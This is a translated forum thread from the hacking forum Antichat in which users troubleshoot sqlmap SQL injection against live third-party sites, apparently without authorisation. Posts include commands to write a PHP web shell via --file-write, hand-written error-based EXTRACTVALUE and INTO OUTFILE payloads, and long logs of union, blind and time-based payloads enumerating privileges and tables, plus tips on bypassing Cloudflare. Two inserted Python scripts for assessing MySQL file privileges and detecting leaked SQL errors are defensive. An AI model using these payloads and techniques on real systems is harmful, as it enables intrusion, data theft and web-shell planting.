ANTICHAT: a forum on information security, OSINT and technology
ANTICHAT is a Russian-speaking community for security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.
⚠️ Old accounts cannot be restored; you need to register again.

25.06.2021, 10:58
Learner (Registered: 06.03.2007 | Posts: 59 | Time on forum: 371875 | Reputation: 137)
brown said:
> SQLi on Magento
> /result/?q=1'
> Acunetix found the SQLi and even pulled out the DB name
> Code:
> Proof of Exploit
> SQL query - SELECT database()
> admin8sasdasd
> When sent through Burp
> site/result/?q=1'
> Response:
> Code:
> HTTP/1.1 503 Service Unavailable
> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1
> Trace:
> Error log record number:
> Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.
> But when I try to run it through sqlmap, it doesn't see the SQLi :(
> Tried --text-only
> Maybe there is some tamper for Magento?

Here you have to look by hand at what triggers the error, and then hand-tune a tamper for it.

11.07.2021, 16:07
Learner (Registered: 30.10.2009 | Posts: 41 | Time on forum: 592140 | Reputation: 6)
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
Code:
[INFO] retrieved: 'root@localhost'
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php
>>Doesn't upload, even though the privileges are there
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell
select user()
Code:
[INFO] retrieved: 'root@localhost'
select 'test' into outfile '/var/www/test.txt'
Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported
What can I try? Or does into outfile simply not execute in an error-based injection? load_file works.

12.07.2021, 18:14
Guest (Posts: n/a | Time on forum: 92829 | Reputation: 212)
Рамос said:
> >>Doesn't upload, even though the privileges are there

The FILE privilege != write permission on the directory
+
you didn't show the user's privileges; root@localhost is not necessarily the MySQL root user,
but I think you know that.
Рамос said:
> Or does into outfile simply not execute in an error-based injection?

In theory it should, since union, error and so on differ only in the way the data is retrieved, i.e. one and the same query
can be union, error, time-based, blind and stacked queries at once, though that doesn't apply to every query and every DBMS.
Though I don't quite understand why the first query worked but the second one errored, never mind.
Рамос said:
> select user()
> Code:
> [INFO] retrieved: 'root@localhost'
> select 'test' into outfile '/var/www/test.txt'
> Code:
> [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

+
crlf said:
> So that's it, I tried it every which way and it just doesn't work

By the way, more bad news, which I only learned the other day. It turns out MySQL got a
secure-file-priv
option which, starting from some version,
by default,
does not let you export/import files outside the configured directory (in
5.7.19
secure-file-priv="/var/lib/mysql-files/"). I.e. even if the user has file_priv, unless
my.cnf
or the startup options explicitly set
secure-file-priv=""
, operations touching the local file system (LOAD_FILE, INTO OUTFILE) will not work outside the configured directory. To find out the value, run the query "
SELECT @@secure_file_priv;
".
https://dev.mysql.com/doc/refman/5.7...cure_file_priv
In your case you could try writing the file to other directories, or look for another vector.

13.07.2021, 00:34
Learner (Registered: 30.10.2009 | Posts: 41 | Time on forum: 592140 | Reputation: 6)
Baskin-Robbins said:
> In your case you could try writing the file to other directories, or look for another vector.

sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
Code:
[23:12:06] [INFO] fetching current user
[23:12:07] [INFO] retrieved: 'root@localhost'
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
@@secure_file_priv
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '
--technique=E
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
--technique=B
Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
The privileges are all fine; I just can't understand why into outfile doesn't execute.
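The two facts this exchange turns on, whether the account holds FILE and what @@secure_file_priv is set to, can be evaluated mechanically from exactly the kind of output posted here (the sqlmap --privileges listing and the raw SELECT @@secure_file_priv result). The Python script below is an added example and is not code from the thread or from sqlmap. It applies the rules Baskin-Robbins described (empty value means no path restriction, a directory value confines file operations to that directory, NULL disables them) and also records the caveat that FILE is not the same as OS write permission on a directory. The function names, the sample privilege listing (a constructed excerpt of the one above) and the account name used in the REVOKE suggestion are assumptions.

```python
"""Rate the file-system exposure of a MySQL account from the FILE privilege
and the secure_file_priv setting.  Added example, not code from the thread."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# secure_file_priv semantics as documented in the MySQL reference manual
# (5.7 and later):
#   NULL       -> LOAD_FILE() and SELECT ... INTO OUTFILE disabled server-wide
#   ''         -> no path restriction at all
#   '/a/dir/'  -> only files under that directory
ADMIN_PRIVS = {"SUPER", "FILE", "PROCESS", "SHUTDOWN", "RELOAD", "CREATE USER"}


@dataclass
class Assessment:
    has_file_priv: bool
    secure_file_priv: Optional[str]
    risk: str                                   # "low" | "medium" | "high"
    findings: List[str] = field(default_factory=list)
    remediation: List[str] = field(default_factory=list)


def parse_sqlmap_privileges(output: str) -> Set[str]:
    """Collect the names from 'privilege: NAME' lines (sqlmap --privileges format)."""
    return {m.group(1).strip() for m in re.finditer(r"privilege:\s*(.+)", output)}


def normalize_secure_file_priv(raw: str) -> Optional[str]:
    """sqlmap prints an empty value as ' ' (quoted single space); the server
    reports NULL when the feature is disabled.  Return the value the server
    actually holds: None for NULL, '' for unrestricted, else the directory."""
    value = raw.strip().strip("'").strip()
    return None if value.upper() == "NULL" else value


def assess(privileges: Set[str], secure_file_priv: Optional[str],
           account: str = "'app'@'localhost'") -> Assessment:
    """Combine the privilege set with secure_file_priv into one rating.
    `account` is only used to render the REVOKE line (placeholder default)."""
    has_file = "FILE" in privileges
    a = Assessment(has_file, secure_file_priv, "low")
    if not has_file:
        a.findings.append("no FILE privilege: the server refuses LOAD_FILE()/INTO OUTFILE for this account")
    elif secure_file_priv is None:
        a.findings.append("secure_file_priv is NULL: file import/export disabled server-wide")
    elif secure_file_priv == "":
        a.risk = "high"
        a.findings.append("FILE privilege with empty secure_file_priv: any path writable by the "
                          "mysqld OS user is reachable through INTO OUTFILE")
        a.remediation.append("secure_file_priv = /var/lib/mysql-files   # [mysqld] section of my.cnf, then restart")
    else:
        a.risk = "medium"
        a.findings.append(f"file operations confined to {secure_file_priv}; a write into the web root "
                          "only succeeds if that directory lies under it")
    if has_file:
        a.remediation.append(f"REVOKE FILE ON *.* FROM {account};")
        # FILE is a database privilege; the target directory must additionally be
        # writable by the OS user mysqld runs as, which cannot be seen from SQL.
        a.findings.append("OS permissions of the mysqld user on candidate directories are not "
                          "visible from inside the database; verify them on the host")
    extra = (privileges & ADMIN_PRIVS) - {"FILE"}
    if extra:
        a.findings.append("application account also holds administrative privileges: " + ", ".join(sorted(extra)))
    return a


# Constructed excerpt of the --privileges listing posted above.
SAMPLE_PRIVILEGES = """[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: CREATE
privilege: FILE
privilege: SELECT
privilege: SHUTDOWN
privilege: SUPER
"""
SAMPLE_SECURE_FILE_PRIV = "' '"   # exactly as sqlmap printed it above

if __name__ == "__main__":
    result = assess(parse_sqlmap_privileges(SAMPLE_PRIVILEGES),
                    normalize_secure_file_priv(SAMPLE_SECURE_FILE_PRIV),
                    account="'root'@'localhost'")
    print("risk:", result.risk)
    for line in result.findings + result.remediation:
        print(" -", line)
```

Run as a script it rates the posted configuration "high": FILE is granted and secure_file_priv is empty, which is precisely the combination the hardening lines at the end of the output remove.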

13.07.2021, 01:57
Guest (Posts: n/a | Time on forum: 92829 | Reputation: 212)
Рамос said:
> @@secure_file_priv
> Code:
> sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
> [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
> [23:18:45] [INFO] resumed: ' '
> select @@secure_file_priv: ' '
> --technique=E
> Code:
> sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
> [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
> --technique=B
> Code:
> sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
> [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
> The privileges are all fine; I just can't understand why into outfile doesn't execute.

Well, for a start, put a semicolon at the end of those last queries)) though maybe sqlmap doesn't need it,
I haven't used it in a long time.
+
https://github.com/sqlmapproject/sqlmap/issues/619
In general the error is about stacked queries, and there are no such injections in MySQL,
I don't know, I would turn verbose up to the maximum and try by hand.
I probably can't help with anything else.

14.07.2021, 00:01
Learner (Registered: 30.10.2009 | Posts: 41 | Time on forum: 592140 | Reputation: 6)
Baskin-Robbins said:
> In general the error is about stacked queries, and there are no such injections in MySQL,
> I don't know, I would turn verbose up to the maximum and try by hand.

Then I'm powerless here. Either I need to go into another thread or just drop it :)
SELECT user();
qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
Code:
General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'
SELECT 123 INTO OUTFILE '/tmp/test.txt';
qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
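The error pages quoted in this post, and in brown's Magento example at the top of the thread (a 503 whose body carried the raw SQLSTATE[42000]/1064 message), are the application-side defect that makes error-based retrieval possible at all: the 1105 XPATH error's quoted text is literally the value being extracted. The Python script below is an added example, not code from the thread or from any project named in it. It scans (status, body) pairs such as a reverse proxy or WAF would log for those error signatures, and rates a response higher when an XPATH error carries extracted data. Function names and the sample responses are assumptions; the sample bodies are constructed from the error strings quoted above.

```python
"""Detect database error text leaking into HTTP responses.
Added example, not code from the thread."""
import re
from typing import Dict, List, Optional, Tuple

# Error formats of the MySQL/MariaDB client layer (PDO-style SQLSTATE prefix,
# error codes 1064 and 1105).  Assumption: the application echoes the driver
# message verbatim, as the Magento 503 page above did.  Extend for other DBMS.
SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("sqlstate_prefix", re.compile(r"SQLSTATE\[\d{5}\]")),
    ("mysql_1064_syntax_error",
     re.compile(r"\b1064\b.{0,80}You have an error in your SQL syntax", re.S)),
    ("mysql_1105_xpath_error",
     re.compile(r"\b1105\b.{0,40}XPATH syntax error", re.S)),
    ("server_version_banner",
     re.compile(r"MariaDB server version|MySQL server version")),
]

# The quoted part of a 1105 message is whatever expression the query fed to
# EXTRACTVALUE/UPDATEXML, i.e. attacker-selected content.
XPATH_VALUE = re.compile(r"XPATH syntax error: '([^']*)'")


def find_db_error_leaks(body: str) -> List[str]:
    """Names of the error signatures present in one response body."""
    return [name for name, rx in SIGNATURES if rx.search(body)]


def xpath_leak_payload(body: str) -> Optional[str]:
    """Return the string quoted in a 1105 XPATH error, or None.
    Its presence means data is actually leaving the database through the
    error channel, not merely that a verbose error page exists."""
    m = XPATH_VALUE.search(body)
    return m.group(1) if m else None


def triage(status: int, body: str) -> Optional[Dict[str, object]]:
    """Classify one response; None when no database error text is present."""
    leaks = find_db_error_leaks(body)
    if not leaks:
        return None
    extracted = xpath_leak_payload(body)
    return {
        "status": status,
        "signatures": leaks,
        "extracted_value": extracted,
        "severity": "high" if extracted is not None else "medium",
        # A 503 with SQL text in the body (the Magento case) is still a leak:
        # the status code is irrelevant, the body is what the client sees.
        "note": "database error text reached the client; serve a generic error "
                "page and keep the driver message in server-side logs only",
    }


def scan(responses: List[Tuple[int, str]]) -> List[Dict[str, object]]:
    """Triage a batch of (status, body) records, keeping only the leaks."""
    return [r for r in (triage(s, b) for s, b in responses) if r is not None]


# Constructed sample records built from the error strings quoted in the thread,
# plus one clean page.
SAMPLE_RESPONSES: List[Tuple[int, str]] = [
    (503, "SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error "
          "in your SQL syntax; check the manual that corresponds to your MariaDB server "
          "version for the right syntax to use near ''/result/''q=1'')' at line 1"),
    (200, r"General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'"),
    (200, "<html><body>Search results: 0 items</body></html>"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RESPONSES):
        print(finding)
```

The first sample is flagged "medium" (verbose error page, no data in it yet); the second is "high" because the quoted XPATH text contains a value pulled from the database, which is what a detection rule on proxy logs should alert on.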

15.07.2021, 03:16
Guest (Posts: n/a | Time on forum: 240 | Reputation: 0)
IIS/dbms:mssql
boolean-based blind/error-based
1. With technique=B, --is-dba=true; with technique=E, --is-dba=false. Why?
2. When listing tables (technique=E): [WARNING] the SQL query provided does not return any output (listing the databases works fine). common-tables helps, but since the site is custom-written it only finds 5 tables.
How do I get sqlmap to list the tables?
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
---
[INFO] fetching tables for database: db1
[PAYLOAD] -1789
[PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
[WARNING] the SQL query provided does not return any output

18.07.2021, 22:14
Guest (Posts: n/a | Time on forum: 96779 | Reputation: 5)
Cloudflare is tough; there are no publicly available tampers for it. One option is to look for the real IP, which doesn't always work.

08.10.2021, 08:20
Guest (Posts: n/a | Time on forum: 43449 | Reputation: 1)
Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found

08.10.2021, 11:09
Guest (Posts: n/a | Time on forum: 10377 | Reputation: 0)
brown said:
> [the full post of 08.10.2021, 08:20 is quoted here; see above]
Code:
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
Start by trying this, plus the tampers you already have, including the one for select. Set verbose 3 and watch what happens.